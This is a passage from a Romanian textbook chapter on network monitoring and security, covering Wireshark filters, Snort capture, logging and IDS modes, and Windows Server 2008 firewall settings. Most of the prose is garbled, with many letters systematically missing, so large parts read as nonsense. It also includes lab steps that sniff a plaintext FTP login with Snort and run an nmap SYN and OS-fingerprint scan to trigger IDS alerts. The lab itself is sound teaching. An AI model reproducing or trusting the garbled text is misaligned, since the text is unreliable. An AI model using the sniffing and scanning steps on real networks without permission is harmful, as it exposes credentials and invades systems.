foloseşte u filt u de aptu ă, se poate i pu e o est i ţie asup a pa hetelo e se do es
aptu ate. “p e e e plu se pot aptu a doa pa hetele u u a u it IP su să, sau după
protocolul de nivel 4 folosit.
 Capture file: ofe ă posi ilitatea de a sal a aptu a î t -un fişie pe dis . A est fişie poate fi
î ă at ulte io şi utilizat pe t u apli a ea u o filt e de afişa e display filters).
Pe t u a po i o aptu ă si plă, se apasă uto ul de sta t di fe east a de opţiu i. Odată
po ită aptu a, fe east a p i ipala a apli aţiei se a î pă ţi î două o po e te:
 cadrul de listare a pachetelor capturate
 cadrul de inspectare a pachetelor capturate
Pe t u a i spe ta u pa het se sele tează pa hetul di ad ul de lista e şi apoi se
a ighează î t -un arbore de antete în cadrul de inspectare.
6.3.1.3 Stream-uri TCP

Una din cele mai importante avantaje Wireshark, este ă poate afişa stream-u i TCP aşa
u su t ăzute de ăt e apli aţii. Î od i pli it Wireshark p ezi tă u stream de i fo aţii
pa het u pa het, ia iti ea u ui şi de date poate fi destul de difi ilă, fii d e oie să se
a igheze p i fie a e pa het. G upa ea î st ea TCP e o st uieşte u şi de date,
p eze tâ d i fo aţia î t -o st u tu ă g upată î o di ea u e elo de se e ţă TCP. Pe t u
a realiza aceasta grupa e î st ea , t e uie dat li d eapta pe u pa het TCP şi sele tată
opţiu ea Follow TCP Stream.
6.3.1.4 Filtre
Î afa a azului î a e se do eşte ealiza ea u ei statisti i p e u ea des isă ai sus,
foa te a a i te e i situaţia î a e se a do i aptu area întregului trafic. Motivul pentru
acest lucru este cantitatea mare de trafic neinteresant. Mai ales pe wireless, doar protocolul în
si e eează a ze e pa hete pe se u dă p i folosi ea de: beacon-uri, ack-u i şi broadcast-
uri. Pentru ca este ineficie tă pa u ge ea u ei liste de aptu ă foa te a e pe t u a ăuta
pachetele dorite, Wireshark pu e la dispoziţie două tipu i de filt e:
 Filtrul de aptură: se poate aplica din meniul de Capture Options şi p esupu e o aptu ă
sele ti ă azată pe egulile filtrului
 Filstrul de afişare: se apli ă peste o aptu a deja efe tuată. Este ai pute i de ăt filt ul de
aptu ă şi este folosit î p eu a u e p esii egulate a a sate pe t u a găsi u a u it tip de
pachete într-o aptu a sal ată.
Aplicarea filtrelor de aptu ă se fa e di e iul Capture Options. Se pot aplica mai multe
filt e p edefi ite u ei aptu i e u ează să fie fă ută. Filt ele de afişa e se i o ă
ase ă ăto , asup a u ei aptu i deja ealizate, din meniul Analyze > Display Filters.
224 | ‘ e ţ e l e L o a l e
6.3.2 Wireshark – configurări avansate

Wireshark i lude două i i-limbaje diferite pentru crearea regulilor de filtrare. În cele ce
u ează se o a aliza ope ato ii şi si ta a li ajul folosit pe t u filt ele de afişa e.
6.3.2.1 Realizarea filtrelor de afişare

Î ese ţă, o i e â p ce apare în cadrul de inspectarea a pachetelor poate fi folosit pentru
a ealiza o egulă. Totalitatea câmpurilor ce pot fi folosite într-o egulă pot fi ăzute în meniul
Help > Supported Protocols > Tabul „Displa Filte Fields .
6.3.2.1.1 Operatori
1. Operatorii de o parație pe a e li ajul îi ofe ă se pot folosi î u a di ele două fo e
posi ile: fo a lite ală şi fo a ate ati ă:
for a literală for a ate ati ă

eq ==
ne !=
gt >
lt <
ge >=
le <=
2. Operatorii logici sunt: and, or, xor şi not.
forma literală for a ate ati ă

and &&
or ||
xor ^^
not !
3. Operatorul boolean este e p i at î od i pli it p i u ele â pului. De e e plu da ă se

foloseşte a filt u a ope ato ul TCP, se vor selecta doar acele pachete ce au ca protocol de
nivel patru TCP. Folosirea operatorului logic not î faţa â pului TCP, are ca rezultat
selectarea pachetelor ce nu folosesc TCP.
4. Adresele IP: su t supo tate p oto oalele Ip şi IP . Este supo tată şi otaţia CID‘:
192.168.1.0/24.
6.3.2.1.2 Câmpurile de filtrare

Regulile de filtra e au două o po e te: ope ato ii şi â pu ile. A estea di u ă su t
specificate precum într-u li aj o ie tat pe o ie te. Da ă se do eşte, sp e e e plu, a esa e
â pului <IP su să> di heade ul IP, fo ula ea se a fa e astfel: ip.src. Sintaxa generala se
deduce, astfel, a fi:
protocol.camp_antent
Î situaţia î a e e istă u â p i lus î t -u alt â p, a estea se pot î lă ţui î a eeaşi

maniera: telnet.auth_mod.name; a est â p ide tifi ă pa hetele e o ţi u ele de
autentificare pentru protocolul telnet.
6.3.2.1.3 Operatori pe string-uri

Wi esha k pu e la dispoziţie şi etode a a sate de sele ţie în interiorul unui câmp.
Pe t u a e pli a ai uşo si ta a, a easta se a u ă i pe e e ple p a ti e de ai jos:
 eth.src[0:2] – acesta expresie va selecta primii o teţi di ad esa MAC su să. Fo atul
[x:y] a efe ii o teţi di ad esa MAC, î epâ d u o tetul .
 eth.src[3-4] – e p esia a sele ta o teţii şi di ad esa MAC su să. Fo atul [x-y] va
efe ii o teţii u i te ul şi di ad esa MAC
 eth.src[1] - expresia va selecta octetul 2 din adresa MAC.
6.3.2.1.4 Apli area u ui filtru de afişare

‘egula de filt a e se i t odu e î â pul poziţio at deasup a ad ului de afişa e a
pachetelor:
6- : Apli area u ui filtru de afişare
6.3.2.1.5 Exemple de reguli de filtrare

1. “ele ta ea tutu o pa hetelo a e au ad esa IP di lasa . . . / şi po tul UDP desti aţie
53
ip.addr == 10.0.0.0/24 && udp.srcport == 53
2. “ele ta ea tutu o pa hetelo u ad esa IP su să . . . a e au itul de TCP FIN setat.

ip.src == 10.0.0.5 and tcp.flags.fin
3. “ele ta ea tutu o pa hetelo a e u au ad esa IP . . . , i i a IP su să, i i a IP desti aţie

!(ip.addr == 10.0.0.5)
Ate ţie! Expresia ip.addr != 10.0.0.5 va evalua întotdeauna true, pe t u ă a testa a el

puţi u ul di â pu ile IP să fie dife it de . . . .
4. Selectarea tuturor pachetelor Ipv4 care au câmpul TTL mai a e sau egal u şi a e au p i ii
3 o teţi ai MAC-ul de la un vendor specific.
ip.version eq 4 and ip.ttl >=2 and eth.addr[0-2] == 00:1A:5E
Bi eî ţeles ă egulile se pot o pli a, depi zâ d de s e a iu, î să pâ ă î a est pu t s-

au des is ele e tele de ază a li ajului filt elo de afişa e.
6.3.2.1.6 Construirea expresiilor regulate în GUI

Wireshark ofe ă supo t g afi pe t u ea ea egulilo u ajo itatea â purilor din
dife ite p oto ole, i di â d hia şi alo i posi ile pe t u u ele di t e ele. I te faţa de
construire a filtrelor de display se a esează u ajuto ul uto ului „E p essio …
6.3.3 Snort – captură de pachete în linie de comandă. )DS/)PS.

Snort este un software open-source folosit pe t u a filt a t afi şi a dete ta tipa e de t afi
e pot ep eze ta o a e i ţa e pe t u o eţea de al ulatoa e. Deşi u os ut a u ul di ele
mai populare IDS –uri (Intrusion detection System), snort a fost la origini un sniffer de pachete,
nu foarte diferit de tcpdump. De fapt, atât t pdu p ât şi s o t foloses i liote a ope -
source libpcap, care permite analiza pachetelor pe un sistem Linux.
Apli aţia a e t ei odu i de fu ţio a e:
226 | ‘ e ţ e l e L o a l e
 Modul si plu de aptu ă de pachete – în acest mod snort aptu ează t afi ul defi it a t afi
interesant
 Modul de aptu ă de pachete cu jurnalizare – snort poate să sto heze aptu a într-u fişie pe
disc în diferite formate: format syslog, text, binar.
 Modul IDS/IPS – în acest mod, snort permite definirea de reguli de identificare a unui tipar de
t afi şi ge e a e de ale te, i o a ea de alte p og a e, et .
6.3.3.1 Instalarea snort

P og a ul se i stalează di apt:
root@myr:/home/rl# apt-get install snort
Î ti pul i stală ii, apli aţia a o figu a într-u od i te a ti i te faţa a ti ă pe a e

snort a as ulta i pli it şi su etul de eţea di a e a a epta pa hete.
După e a fost i stalat, se poate e ifi a e iste ţa utilita ului î alea i pli ită, ulâ d
comanda snort. Apli ată fă ă niciun pa a et u, o a da a afişă toate opţiu ile snort
alătu i de u esaj e pli ati .
root@myr:/home/rl# snort
[...]
Uh, you need to tell me to do something...
6.3.3.2 Modurile de fu țio are s ort

S-a e ţio at a te io faptul a snort a fost la început doar un utilitar folosit pentru
aptu ă de pa hete î li ie de o a dă. Î ti p el a e oluat sp e a î depli i ai ulte sa i i,
î să fă ă a-şi pie de fu ţio alitatea de ază: sniffer. Da , e e i d la teo ia p eze tată
a te o î a ţe, folosirea unui switch într-o reţea Ethernet asigu ă faptul ă fie a e staţie de
pe segment, va primi numai traficul destinat acesteia. Cum poate deci un administrator în
eţelele di p eze t, să foloseas ă u sniffer? Cea ai folosită soluţie î i ple e tă i este
tehnica de port mirroring. Aceasta presupune configurarea unui switch, pentru ca traficul care
t a e sează a u ite po tu i să fie opiat pe u po t spe ial o figu at de ad i ist ato .
6-8: Port mirroring

Folosi d po t i o i g î o figu aţia de ai sus, se poate configura switchul astfel încât
t afi ul de pe po tu ile , şi să fie opiat pe po tul pe a e se află se e ul e ulează
snort.
Se vor prezenta pe scurt în continuare cele trei moduri în care snort ope ează:
6.3.3.2.1 Modul si plu de aptură

snort se ulează după u s-a p eze tat ai sus, î li ie de o a dă. “i ta a pe a e
utilita ul o foloseşte este u ătoa ea:
snort [options] expression
E p esia pe a e s o t o p i eşte a a gu e t este folosită pe t u a defi i filt e î li ia de

o a dă. E istă ai ulte p i iti e şi u i te heie a e se pot folosi, da deoa e e
a o da ea p eze tă ii a estui utilita a fi u a azată ai ult pe e e ple şi fu ţio alitate,
a estea u o fi e u e ate ai i. Pe t u o lista o pletă a p i iti elo şi e p esiilor se poate
consulta pagina man a apli aţiei.
“e a ea u ăto ul s e a iu:
 Pe o staţie di su etul . . . / se va rula snort î odul si plu de aptu ă şi î
a elaşi ti p u se e FTP proftpd)
 De pe o staţie di alt su et . . . / , se a i iţia o o e iu e FTP pe po tul ăt e
serverul pe care snort as ultă.
 Scopul va fi capturarea user-ului şi pa olei FTP u ajuto ul snort, t i ise î te t la pe eţea
Mai întâi se va porni snort folosi d o e p esie egulată e a aptu a doa t afi ul cu IP
desti aţie . . . adi ă staţia lo ală şi u po tul desti aţie FTP .
root@myr:/home/rl# snort -vde host 192.168.1.2 and port 21
Parametrii -v -d şi -e apli ă u ătoa ele opţiu i:

 -v: p i tează aptu a la ieşi ea sta da d
 -d: afişa ea i fo aţiei de la i elul apli aţie
 -e: afişa ea header-ului de nivel 2 într-un log sau la ieşi ea sta da d
În timp ce snort ulează, se a po i şi u se e FTP pe a eeaşi staţie:
root@myr:/home/rl# /etc/init.d/proftpd start
De pe staţia u IP-ul 192.168. . , se a fa e o o e iu e ăt e se e ul FTP:

root@myr:/home/rl# ftp 192.168.1.2
Connected to 192.168.1.2.
220 ProFTPD 1.3.1 Server (Debian) [192.168.1.2]
Name (192.168.1.2:rl): rl
331 Password required for rl
Password:
230 User rl logged in
[...]
După u se poate o se a di ezultatul de ai jos, snort a aptu at i fo aţia di

pachet de la nivel 2 la nivel 7.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
09/07-18:05:34.732455 0:E0:20:20:14:48 -> 0:17:31:49:39:99 type:0x800 len:0x4B
192.168.0.254:50613 -> 192.168.1.2:21 TCP TTL:63 TOS:0x10 ID:7505 IpLen:20 DgmLen:61 DF
***AP*** Seq: 0x9751DAEE Ack: 0xB5B61579 Win: 0x5C TcpLen: 32
TCP Options (3) => NOP NOP TS: 26265674 26264608
55 53 45 52 20 72 6C 0D 0A USER rl..
[...]
09/07-18:05:34.733011 0:17:31:49:39:99 -> 0:E0:20:20:14:48 type:0x800 len:0x60
***AP*** Seq: 0xB5B61579 Ack: 0x9751DAF7 Win: 0x5B TcpLen: 32
33 33 31 20 50 61 73 73 77 6F 72 64 20 72 65 71 331 Password req
75 69 72 65 64 20 66 6F 72 20 72 6C 0D 0A uired for rl..
[...]
09/07-18:05:35.957654 0:E0:20:20:14:48 -> 0:17:31:49:39:99 type:0x800 len:0x4B
***AP*** Seq: 0x9751DAF7 Ack: 0xB5B61597 Win: 0x5C TcpLen: 32
50 41 53 53 20 72 6C 0D 0A PASS rl..
228 | ‘ e ţ e l e L o a l e
P o le a folosi ii afişă ii la ieşi ea sta da d este faptul ca snort poate captura mult mai
repede de ât poate afişa pe e a . De a eea la u t afi susţi ut, snort a î epe să sa ă
peste u ele pa hete pe t u a putea afişa i fo aţia pe monitor. De aceea, de obicei, snort se
ulează u opţiu ea -l, care permite salvarea capturii în jurnale.
6.3.3.2.2 Modul de captura de pachete cu jurnalizare

Pe t u si plitate, se a folosi a elaşi s e a iu a şi î su apitolul a te io . La i stala e,
s o t îşi eează u di e to spe ial folosit pe t u ju ale şi ale te: /var/log/snort. E istă
două odu i dife ite de ju aliza e:
 Modul clear text: este ai î et, î să se poate iti uşo i fo aţia di log-uri.
 Modul binar: este cel mai rapid mod de jurnalizare, însă e e oie de utilita e spe iale pe t u a
citi logurile. De asemenea formatul binar este compatibil cu tcpdump şi ofe ă şi a a tajul
posi ilităţii apli ă ii a ai ulte eguli snort asupra capturii, pentru a analiza pachetele
pentru un posibil atac.
Modul de logare în format clear-text

În continuare se va rula din nou snort, î sa de a estă dată, u ju aliza e:
root@myr:/home/rl# snort -vde host 192.168.1.2 and port 21 -l /var/log/snort/ -K ascii
Opţiu ea –K este folosită pe t u a p e iza tipul ju aliză ii.

După e se pa u g a eeaşi paşi a ai sus: po i ea se e ului FTP şi log-area, se va
o se a ă î di e to ul /var/log/snort s-a eat u di e to al ă ui u e, este IP-ul sursă
al pachetelor de conexiune FTP: 192.168.0.254..
root@myr:/var/log/snort# ls
192.168.0.254
root@DMZ:/var/log/snort# file 192.168.0.254/
192.168.0.254/: setgid directory
Doa î azul folosi ii ju aliză ii î fo at ASCII se eează âte u di e to pe t u fie a e

IP su să a e des hide o o e iu e. Î a est di e to se află u fişie clear-text, î a e se află
sto ată aptu a.
root@myr:/var/log/snort# ls 192.168.0.254/
TCP:56443-21
root@myr:/var/log/snort# file 192.168.0.254/TCP\:56443-21
TCP:56443-21: ASCII text
Modul de logare în format binar

De această dată, pa a et ul opţiu ii -K este pcap, pentru jurnalizarea în format binar
compatibil cu tcpdump.
root@myr:/home/rl# snort -vde host 192.168.1.2 and port 21 -l /var/log/snort/ -K pcap
A est tip de ju aliza e este ult ai apid şi sp e deose i e de el odul clear-text,

aptu a este păst ată î t -u si gu fişie :
root@myr:/var/log/snort# ls
snort.log.1220806500
root@myr:/var/log/snort# file snort.log.1220806500
snort.log.1220806500: tcpdump capture file (little-endian) - version 2.4 (Ethernet,
capture length 1514)
“ o t ofe ă i eî teles şi u od fa il de a iti i fo aţia di t -o aptu ă î fo at i a ,

folosi d opţiu ea –r:
root@myr:/var/log/snort# snort -dev -r snort.log.1220806500
[...]
Deasemenea, formatul pcap este folosit şi de apli aţii u i te faţa GUI, precum Wireshark.
De i aptu a poate fi î ă ată şi izualizată şi î od g afi .
6.3.3.3 Modul IDS/IPS

Deşi odul de loga e al utilita ului este foa te util, snort a devenit faimos pentru
apa ilităţile sale de IDS.
Un IDS este un sistem software sau hardware folosit pe t u dete ta ea u ei î e ă i de
acces, manipulare, sau atac asupra unui sistem.
A ţiu ea de ază pe a e o i e ID“ t e uie o î t ep i de la dete ta ea u ui t afi e idi ă
suspiciuni, este provocarea unei alarme în sistem. În continuare se va analiza modul în care
poate fi folosit snort pe t u a î depli i a eastă fu ţie.
Înainte de a putea porni snort î odul ID“, t e uie odifi at fişie ul p i ipal de
configurare: /etc/snort/snort.conf. T e uie spe ifi at a e este eţeaua pe a e snort
tre uie sa o p otejeze şi a e este eţeaua de la a e se pot aştepta ata u i. Pe t u a est lu u,
s o t defi eşte două a ia ile: $HOME_NET şi $EXTERNAL_NET. Aceste sunt implicit setate pe
a î fişie ul de o figu a e. Doa $HOME_NET a t e ui s hi ată la ad esa de eţea a LAN-
ului.
root@myr:/home/rl# cat /etc/snort/snort.conf
var HOME_NET 192.168.1.0/24
# Set up the external network addresses as well. A good start may be "any"
var EXTERNAL_NET any
Di o figu aţia de ai sus, snort va considera ca reţeaua e t e uie p otejată este

eţeaua . . . / , ia o i e alta eţea var EXTERNAL_NET any este ăzută a o posi ilă
a e i ţa e.
Pentru a putea demonstra modul în care snort a ţio ează se a p esupu e u ăto ul
scenariu:
 De pe staţia u IP-ul 192.168.0.254 de pe care s-a i iţiat o e iu ea FTP î e e plul a te io ,
se va porni acum o scanare nmap cu fingerprint-ing.
 snort a dete ta a eastă î e a e de s a a e şi a ea u fişie de ala ă î
/var/log/snort/ care se va putea interpreta cu utilitare speciale.
Mai î tâi se a epo i s o t pe t u a asigu a ei te p eta ea fişie ului de o figu a e:
root@myr:/home/rl# /etc/init.d/snort restart
* Stopping Network Intrusion Detection System snort [ OK ]
* Starting Network Intrusion Detection System snort [ OK ]
Rularea se poate verifica prin listarea procesului în sistem:

root@myr:/var/log/snort# ps -ef | grep snort
snort 18215 1 8 21:27 ? 00:00:06 /usr/sbin/snort -m 027 -D -d -l
/var/log/snort -u snort -g snort -c /etc/snort/snort.conf -S HOME_NET=[192.168.0.0/16] -i eth2
A u ă snort ulează, u t e uie de ât să po i s a a ea de po tu i. “e a fa e o

s a a e u pa hete TCP “YN şi u fingerprint.
root@myr:/home/rl# nmap -sS -O 192.168.1.2
După e s a a ea s-a terminat se poate verifica /var/log/snort/.

root@myr:/var/log/snort# ls -l
total 44
drwx--S--- 2 root adm 4096 2008-09-07 19:46 192.168.0.254
-rw-r----- 1 snort adm 5875 2008-09-07 21:33 alert
-rw------- 1 root adm 15369 2008-09-07 21:33 snort.log.1220806500
-rw------- 1 root adm 12212 2008-09-07 21:33 snort.log.1220812428
-rw-r----- 1 snort adm 1871 2008-09-07 21:33 tcpdump.log.1220812063
230 | ‘ e ţ e l e L o a l e
S-a ge e at u fişie de ale tă de ap o i ati KB. Pe t u a putea i te p eta a est fişie

se pot folosi destul de ulte utilita e, atât î li ie de o a dă, ât şi î ediu g afi . U ul di
cele mai cunscute este snortsnarf. A est utilita poate i te p eta u fişie de ala ă ge e at
de snort şi îl poate afişa î fo at HTML u link-uri utile ăt e dife ite site-uri ce pot spune
mai multe despre tipul de atac interceptat.
6.4 Securitate şi monitorizare în Windows Server 2008

P oteja ea eţelei i te e î pot i a ata u ilo di e te io este o espo sa ilitate e t e
de i po ta tă, ai ales â d eţeaua lo ală t e uie o e tată la o eţea pu li ă, u u a es
ult ai puţi est i ţio at, a I te etul. Windows Server 2008 i ple e tează o se ie de
st ategii pe t u asigu a ea se u ităţii de siste , p i t e a e Windows Firewall şi IP“e
(protocolul IP Security).
6.4.1 Windows Firewall with Advanced Security

Un firewall este defi it a o o po e tă software sau hardware, i te pusă î t e siste
eţea şi I te et de ele ai ulte o i u olul de a p oteja î pot i a a eselo
neautorizate din exterior, analizâ d datele a e i ulă î a ele se su i şi luâ d de izii de
filtrare (blocare) atunci când este cazul. Deciziile de filtrare a pachetelor se iau conform cu
regulile definite în firewall. Da ă pa hetele a e soses di e te io u se o fo ează i iu ei
reguli din firewall, acestea sunt filtrate, în mod implicit. De asemenea, firewall-ul poate fi setat
să e ifi e şi pa hetele a e pă ăses siste ul sau eţeaua p op ie p i i stitui ea u o eguli
e o t olează a esul a u ito apli aţii sp e I te et.
Windows Firewall este unul de tip stateful, adi ă u ă eşte sta ea o e iu ilo de eţea
ale u ui siste , e a i â d atât t afi ul di e ţio at sp e eţea ât şi el sp e e te io . Pe t u
t afi ul di sp e e te io , o po ta e tul i pli it al său este de a loca orice pachet care
soseşte esoli itat, adi ă u ep ezi tă ăspu sul la o e e e sau u fa e pa te di t afi ul u ei
o e iu i i iţiate de al ulato ul p op iu. Totuşi, â d este e esa , pot fi o figu ate e epţii
pentru a permite anumitor tipuri de t afi să fie e epţio ate de ăt e a u ite apli aţii, pe
anumite porturi.
Comportamentul implicit pentru traficul originar din sistemul propriu este unul permisiv,
efii d filt ate i iu fel de e e i. Totuşi, pot fi i ple e tate eguli a e să li iteze accesul
a u ito apli aţii la I te et
6.4.1.1 Configurarea Windows Firewall

Pentru configurarea Windows Firewall pe un sistem Windows Server 2008 e istă două
odu i: p i ul di t e ele îl ep ezi tă fe east a de dialog Windows Firewall Settings,
dispo i ilă şi pe t u Wi do s XP şi a esi ilă di e t di Control Panel; cea de-a doua este
i te faţa de ad i ist a e pe t u Windows Firewall with Advanced Security, a esi ilă de la
Administrative Tools sau din Server Manager.
Pentru a deschide fereastra de dialog Windows Firewall Settings, se poate alege opţiu ea
Allow a Program Through the Windows Firewall din Control Panel, sub categoria Security sau
direct accesând Windows Firewall, tot di Co t ol Pa el, a şi î Wi do s XP î fu ţie de
modul de vizualizare activ).
Setă ile de ază ale lui Windows Firewall sunt separate în trei categorii:
 General: Î a est ta se găses ele ai si ple opţiu i, de po i e şi op i e a firewall-ului. De
ase e ea, e istă şi posi ilitatea de lo a e a tutu o o e iu ilo i iţiate di e terior (Block all
incoming connections pe t u a a ti a apid p ote ţia totală î eţele pu li e, ese u izate.
A eastă opţiu e ig o ă toate e epţiile a ti e la a el o e t.
6-1: Apli ațiile per ise pri Windows Firewall
 Exceptions: Lista up i de apli aţiile dete tate î siste ia ifa ea lo a e a efe t a ti a ea

pe isiu ii apli aţiilo de a des hide po tu i. Pot fi adăugate oi p og a e e e uta ile, de
fapt la lista de e epţii sau pot fi adăugate sepa at şi po tu i.
 Advanced: Ai i pot fi sele tate o e iu ile de eţea pe a e Windows Firewall să le
o ito izeze. De ase e ea, de ai i pot fi estau ate setă ile i pli ite legate de fu ţio a ea
firewall-ului şi de e epţiile sale.
După u se o se ă, fe east a de dialog des isă ai sus u ofe ă o ultitudi e de

opţiu i legate de o figu a ea Windows Firewall şi u poate fi o side ată efe ti o u ealtă
ad i ist ati ă deoa e e ofe ă u g ad e t e de s ăzut de fle i ilitate.
Da ă se do eşte odifi a ea u o setă i ai a a sate eguli, î speţă, a e, la â dul lo ,
fo ează politi ile de se u itate t e uie utilizată i te faţa Windows Firewall with Advanced
Security, a esi ilă di Server Manager sau de la Start > Administrative Tools. Aceasta
ofe ă opţiu ea de a gestio a egulile de i t a e şi ieşi e a pa hetelo şi de a ea eguli de
se u itate pe t u o e iu i a e pot est i ţio a o e ta ea la u se e pe aza u o
i fo aţii de aute tifi a e ai o ple e, u a fi apa te e ţa la u do e iu.
I te faţa este î pă ţită î t ei pa ou i:
 î stâ ga, u pa ou e afişează dife itele ele e te de o figu a e, u su t egulile sau
opţiu ile de o ito iza e;
 î pa tea d eaptă pa oul de a ţiu i, o u elo ai ulte i te feţe de ad i ist a e di
Server Manager;
 î pa tea e t ală pa oul de detalii, al ă ui o ţi ut se odifi ă di a i , î fu ţie de
sele ţiile di p i ul pa ou.
232 | ‘ e ţ e l e L o a l e
6-2: I terfața de ad i istrare Windows Firewall with Advanced Security
În mod i pli it, pa oul e t al, de detalii, afişează atu i â d î stâ ga este sele tată
ădă i a firewall-ului: Windows Firewall with Advanced Security on Local Computer o listă u
trei profiluri: Domain, Public şi Private. A este p ofilu i se află î legătu ă u tipu ile de
o e iu i afişate şi de i te faţa Network and Sharing Center p eze tată î se ţiu ea 3.4.1 şi
o ţi setă i dife ite î fu ţie de is u ile pe a e dife ite tipu i de o e iu i le p ezi tă. Ele
au ele a ţă î o te tul lui Windows Firewall după u u ează:
 Domain: Cal ulatoa ele e ulează Wi do s Vista sau Windows Server 2008 pot dete ta da ă
se poate ealiza apa te e ţa la u do e iu î t -o a u ită eţea la a e su t o e tate. A est
profil e esită a toate al ulatoa ele să fie e e ale u ui do e iu pe t u a putea a esa
controller-ul de domeniu.
 Public: Profilul Public este folosit de ăt e firewall pentru a proteja sistemul când acesta este
o e tat la o eţea pu li ă, sp e e e plu una wireless. Practic, pentru Windows Server 2008, o
eţea pu li ă ep ezi tă o i e eţea a e u se află î i te io ul pe i et ului eţelei deli itate
de firewall-ul acesteia.
 Private: P ofilul o u i ă firewall-ului odul î a e să p otejeze siste ul în momentul în care
a esta este e u al u ei o e iu i p i ate, adi ă apa ţi e u ei eţele p otejate de u
firewall hardware.
Pe t u ă fie a e di t e ele t ei p ofilu i poate sto a setă i disti te u p i i e la egulile

firewall-ului, a estea ofe ă u grad sporit de flexibilitate în optimizarea nivelului de securitate
oferit de firewall pe t u dife ite tipu i de o e iu i. “p e e e plu, o e iu ile sp e eţele
publice vor folosi profilul Public care va impune un set de reguli mai restrictive, în timp ce
o e ta ea la eţelele lo ale izolate, se u izate şi/sau aflate su p op ia ad i ist a e poate
e esita u set ai pe isi de eguli, u a fi pa taja ea fişie elo şi a i p i a telo î
eţea, eguli o figu ate î ad ul p ofilului Private.
Modificarea tipului u ei o e iu i se poate fa e a ual ai puţi pe t u tipul Domain,
a e a e e i ţe supli e ta e . Wi do s apli ă, î să, şi î od auto at a este p ofilu i î
fu ţie de tipul de t afi i spe tat pe i te faţa o e tată. Astfel ă, î azul apa te e ţei la u
do e iu, se apli ă î tâi p ofilul Domain, ajungându-se ulte io la opţiu ea de a apli a u ul
di t e elelalte două p ofilu i. Pe t u situaţia de ai sus, peste p ofilul Domain se apli ă
automat profilul Private deoa e e se o side ă ă zo a deli itată de staţiile di t -o eţea,
e e ale u ui do e iu, ep ezi tă deja o zo ă de u a u it g ad de se u itate şi
sigu a ţă. Da ă i te faţa u este aute tifi ată la u controller de domeniu (deci conexiunea sa
u este e ă a u ui do e iu atu i se apli ă auto at p ofilul Public.
6-3: I terfața proprietăților u ui profil
Pe t u a a esa setă ile p ofilu ilo i pli ite, se poate fa e li pe link-ul Windows Firewall
Properties din panoul de detalii, la baza regiunii Overview, în care sunt listate aceste profiluri
(figura 6-3).
“e o se ă ă toate ele t ei p ofilu i se o figu ează si ila , spe ifi â du-se starea
firewall-ului şi odul de t ata e a o e iu ilo î fu ţie de se sul î a e au fost i iţiate. La
apăsa ea uto ului Customize su t dispo i ile opţiu i supli e ta e e ad esează otifi a ea
utilizatorului în momentul în care firewall-ul lo hează o apli aţie şi o po ta e tul pe is
de firewall în cazul î a e siste ul î ea ă să ăspu dă p i unicast în urma unui trafic de
broadcast sau multicast di eţea.
234 | ‘ e ţ e l e L o a l e
6.4.1.2 Modificarea regulilor implicite

Luâ d î o side a e setă ile a te ioa e, dispo i ile la i el de p ofil, este e ide t faptul
ă dife e ţie ea ea ai d asti ă şi totodată ea ai g a ula ă di t e p ofilu i se edu e la
i ple e ta ea egulilo . P a ti , la i el de t afi , egulile su t ele a e di tează
comportamentul lui Windows Firewall. Acestea se împart în trei categorii: inbound rules
(pent u t afi ul a e „i t ă p i t -o conexiune), outbound rules (pentru traficul adresat spre
e te io şi connection security rules.
Regulile de tip inbound se efe ă, de fapt, la „de lo a ea t afi ului e it di e te io .
După u s-a e ţio at şi î se ţiu ea a te ioa ă, pe t u toate ele t ei tipu i de p ofilu i
(Domain, Private şi Public), comportamentul implicit al firewall-ului pe t u o e iu ile i iţiate
di e te io este de a le lo a. Î o t ast, o po ta e tul i pli it pe t u o e iu ile i iţiate
de aşi a pe a e ulează firewall-ul este permiterea tuturor acestora prin firewall, astfel ă
regulile de tip outbound ad esează a e di t e a este o e iu i o fi, de fapt, lo ate.
Atât pentru regulile de tip inbound ât şi pe t u ele outbound, categoriile de reguli pe
care Windows Firewall pe ite să fie eate su t î u ă de t ei, u posi ilitatea de a ea şi
reguli Custom:
 Program: De izia se ia î fu ţie de p og a ul a e i iţiază o o e iu e egulă outbound) sau
a e do eşte des hide ea u ui po t egulă inbound . I fo aţia a e ide tifi ă apli aţia
up i de doa alea sp e e e uta ilul său.
 Port: Astfel de reguli au în vedere conexiunile pe baza numerelor de port (unul sau un interval)
pe a e a estea le utilizează. Tot ai i se poate spe ifi a şi pe t u e p oto ol de i el t a spo t
TCP sau UDP se apli ă egula.
 Predefined: A este eguli ge e alizează a u ite p og a e sau se i ii ale siste ului
si plifi â d detaliile fu ţio ă ii lo . “p e e e plu, o astfel de egulă poate fi i stituită pentru
a o t ola a esul la pa taja ea fişie elo sau i p i a telo sau pe t u a pe ite fu ţio a ea
protocolului Remote Desktop pe t u ad i ist a ea de la dista ţă .
Afişa ea egulilo defi ite i pli it î Windows Firewall se face printr-un simplu clic pe
atego ia do ită î pa oul di stâ ga: Inbound Rules sau Outbound Rules. Deoarece lista poate
de e i destul de up i zătoa e, ai ales după defi i ea egulilo p op ii şi pe se e e u o
ultitudi e de apli aţii şi se i ii i stalate, a esteia i se pot apli a filt e di pa oul de a ţiu i1.
Apli a ea filt elo poate ad esa p ofilul de a e a estea apa ţi , sta ea lo a ti e sau u şi
g upul di a e fa pa te adi ă apli aţia sau se i iul de a e apa ţi . Filt ele pot fi apli ate
se e ţial. Pe t u şte ge ea tutu o filt elo a ti e se fa e li pe link-ul Clear all filters.
Pe t u a izualiza p op ietăţile u ei eguli i dife e t da ă este de tip inbound sau
outbound , se poate fa e du lu li pe egulă di pa oul e t al i dife e t de p eze ţa
filtrelor).
Ate ţie, u se pot odifi a toate p op ietăţile egulilo p edefi ite; î ele ai ulte
di t e azu i, e e uta ilul aso iat egulii u poate fi s hi at, la fel a şi po tu ile şi setul de
p oto oale i luse î egulă. A este est i ţii su t i puse deoa e e egulile i pli ite ad esează
fu ţio a ea se i iilo Wi do s a e foloses po tu i şi p oto oale sta da d pe t u a
comunica.
1
Este de la si e î ţeles ă filt ele afe tează doa afişa ea a u ito eguli; ele u afe tează î i iu fel
fu ţio a ea lo . Pe t u a easta se foloseşte p op ietatea E a led dispo i ilă pe t u fie a e egulă.
6-4: Proprietățile u ei reguli inbound
Fereastra de dialog a prop ietăţilo u ei eguli o ţi e u ătoa ele se ţiu i:

 General: Cup i de u ele şi o des ie e te tuală a egulii, ofe ă posi ilitatea de a a ti a sau
deza ti a egula şi tipul a ţiu ii des ise de egulă: pe ite ea o e iu ii, lo a ea ei sau
permiterea în o diţii se u izate1 (IPSec . Da ă egula e e a o o e iu e pe isă să fie
